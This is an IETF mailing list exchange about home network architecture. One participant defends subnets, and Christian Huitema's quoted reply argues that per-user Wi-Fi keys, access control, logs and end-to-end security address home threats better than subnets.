subnets have proven to a useful tool in the past, and may prove so again in the future, even if the reasons for future use are different than those for past and present use. I don't see why we should constrain the network architecture to deny use of this tool to ordinary users. Keith >> Assume we agree on the needed functionality. It is hard to >> disagree and many of us have seen the need to isolate some >> people and apparatus from others, and to assign different >> capability to them, for many years. >> > > People want security, and the threats that Michael mention are real: > children spying on the parent's traffic, guests abusing the access to do > something illegal on the Internet. But subnets are not a particularly > efficient way of solving these threats. > > Take the issue of guests abusing the privilege and engaging in illegal > action. The concrete risk is that men in black will knock at your door > and ask about said actions. Picture yourself arguing that "it obviously > wasn't me, because the packets come from the network that I provide to > my guests". The men in black will not be impressed, since you obviously > have access to all the networks in your house. Your only defense will be > to rat a specific guest, supposing of course that you are so enclined. > Subnet or no subnet will no help you do that. Access control and logs > will help, but these are not tied to subnets. > > Consider then the attacks between computers on the same network. Michael > mentioned traffic snooping. But modern Wi-Fi network are protected > against that already. They negotiate different per-session keys. Even in > promiscuous mode, the Wi-Fi card does not see the unicast traffic of the > other stations in the network. In home networks, the key is derived from > an initial 4-ways handshake, secured by a pass-phrase. Most deployments > use a single pass-phrase today, so teenagers could indeed develop tools > to crack the exchange. But nothing prevents using different pass-phrases > for different group of users. > > The other risk are the active attacks between connected computers. > However, as John pointed out, there is lot of demand for connectivity > between computers in the home. Many people have tried to engineer > network topologies that follow organization or authorization boundaries, > but the mostly that makes your network expensive to run without really > solving the issues. > > Also, ultimately, all forms of topology based control rely on the > security of the home router. Do you really believe that a teenager who > is clever enough to hack into Wi-Fi access protections will not also be > able to hack into the home router? > > If we want actual protection, it is probably much easier to use end to > end security. And in your own house, you might consider forms of social > control, as in "OK, you hacked my computer, give me the keys of your > car..." > > Frankly, I don't see users managing subnets any time soon. > > -- Christian Huitema > > > > > > > > > _______________________________________________ > Ietf mailing list > Ietf@xxxxxxxx > https://www1.ietf.org/mailman/listinfo/ietf > _______________________________________________ Ietf@xxxxxxxx https://www1.ietf.org/mailman/listinfo/ietf